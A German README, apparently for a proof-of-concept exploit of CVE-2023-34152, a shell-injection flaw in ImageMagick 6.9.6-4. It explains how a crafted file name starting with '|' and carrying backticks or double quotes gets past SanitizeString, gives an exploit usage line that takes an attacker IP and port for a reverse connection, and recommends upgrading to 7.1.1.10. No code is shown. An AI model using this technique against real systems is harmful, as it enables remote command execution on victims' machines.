
POC für ImageMagick 6.9.6-4. Dies ist ein POC, der von fullwaywangs Entdeckung von CVE-2023-34152 inspiriert wurde.
RCE-Schwachstelle, die ImageMagick 6.9.6-4 betrifft. Diese Schwachstelle ermöglicht es dem Angreifer, Befehle auf dem Opfersystem auszuführen und somit eine Remote-Befehlsausführung zu ermöglichen.
Dies ist ein POC, der von der Entdeckung des CVE-2023-34152 durch fullwaywang inspiriert wurde.
Usage: python3 CVE-2023-34152.py Attacker_IP Attacker_Port
Eine Schwachstelle zur willkürlichen Codeausführung (Shell-Befehlseinschleusung) in OpenBlob, die eigentlich eine unvollständige Korrektur von CVE-2016-5118 darstellt.
CVE-2016-5118 zeigte, dass ImageMagick beim Öffnen einer Bilddatei, deren Name mit einem '|'-Zeichen beginnt, den restlichen Teil des Dateinamens per popen ausführt. Als Korrektur wurde eine Konfigurationsoption --enable-pipes hinzugefügt, um die Unterstützung von Pipes gezielt zu aktivieren; außerdem wurde vor dem Aufruf von popen_utf8 des Dateinamens die Funktion SanitizeString eingefügt, um eine willkürliche Befehlsausführung zu unterdrücken.
Allerdings filtert SanitizeString nur Zeichen wie einfache Anführungszeichen heraus, nicht jedoch ` oder ". Dies ermöglicht eine Shell-Befehlseinschleusung durch einen fehlerhaften Dateinamen.
Quellen: fullwaywang
Aktualisieren Sie auf Version 7.1.1.10